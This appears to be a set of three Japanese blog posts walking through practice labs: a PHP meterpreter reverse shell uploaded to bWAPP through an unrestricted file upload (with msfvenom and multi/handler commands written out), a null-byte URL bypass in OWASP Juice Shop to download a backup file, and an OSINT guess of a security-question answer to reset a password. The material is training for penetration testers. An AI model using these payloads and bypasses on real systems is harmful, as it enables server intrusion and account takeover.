Hello there, ('ω')ノ

Unrestricted File Uploadを。

画像ファイル以外になんでもアップロードできるので脆弱性ありなのですが。

ここからがペネトレーションテストの領域で。

まずは、ペイロードのモジュールを一覧表示させて。

　msfvenom -l payloads

今回は、この中からチョイスしょうと。

使用するペイロードのオプションの確認を。

　msfvenom -p php/meterpreter/reverse_tcp --payload-options

ここで一応、IPアドレスの確認をしておいて。

ペイロードのプログラムファイルを作成することに。

　msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.16 LPORT=4444 R > exploit.php

作成したファイルをbWAPPにアップロードして。

次に下記を起動して。

　msfconsole

今回は、exploit/multi/handlerを使いたいので。

下記の手順で、ペイロードタイプやローカルホストのIPアドレス等を設定して。

最後にexploitでリスナーを起動して。

　use exploit/multi/handler
　set payload php/meterpreter/reverse_tcp
　set lhost 192.168.0.16
　set lport 4444
　exploit

bWAPPでhereをクリックすると。

アップロードしたphpファイルが起動して。

meterpreterが起動してbWAPPのサーバに侵入することができて。

上記のページを落としても通信は継続されて。

Best regards, (^^ゞ

Hello there, ('ω')ノ

いくつかの資格情報の危険性について開発チームに通知しなさいと。

いつものディレクトリにアクセスして。

この時点で脆弱性ありで。

　http://localhost:3000/ftp

さらにヌルバイトでファイルにアクセスできるので、ダウンロードして。

ここまでが脆弱性診断で。

　http://localhost:3000/ftp/package.json.bak%2500.md

ファイルの中身を見ると。

インシデントのあるモジュール名が。

ここからがペネトレーションテストの領域で。

さっそく、検索してみて。

　eslint-scope 3.7.2

下記のURLを。

　https://github.com/eslint/eslint-scope/issues/39

URLを報告して。

クリアできた。

Best regards, (^^ゞ

Hello there, ('ω')ノ

Benderのセキュリティの質問に対する元の回答を使用して.

パスワードをリセットしなさいと。

セキュリティの質問はいくつかあって。

とりあえずは、下記で検索を。

　bender first company

ミドルネームらしきものが。

さっそく、トライしたもののうまくいかず。

また以前は、Suicide booth construction worker (formerly)とのことで。

下記で検索を実施して。

　Suicide booth Futurama

下記のサイトからヒントを見つけ出して。

　https://en.wikipedia.org/wiki/Euthanasia_device

再度、下記で検索してみて。

　Stop-and-Drop suicide booths

下記のサイトに会社名らしきものが。

　https://theinfosphere.org/Suicide_booth

リンク先のサイトをみて再確認して。

　https://theinfosphere.org/Stop-N-Drop

下記のキーワードを入力するもののうまくいかず。

記号を変更したりと数回チャレンジすると。

　Stop-N-Drop

　Stop'N'Drop

　Stop'n'Drop

クリアできた。

これはペネトレーションテストというかレッドチームの領域のような。

脆弱性診断の領域ではなくて。

Best regards, (^^ゞ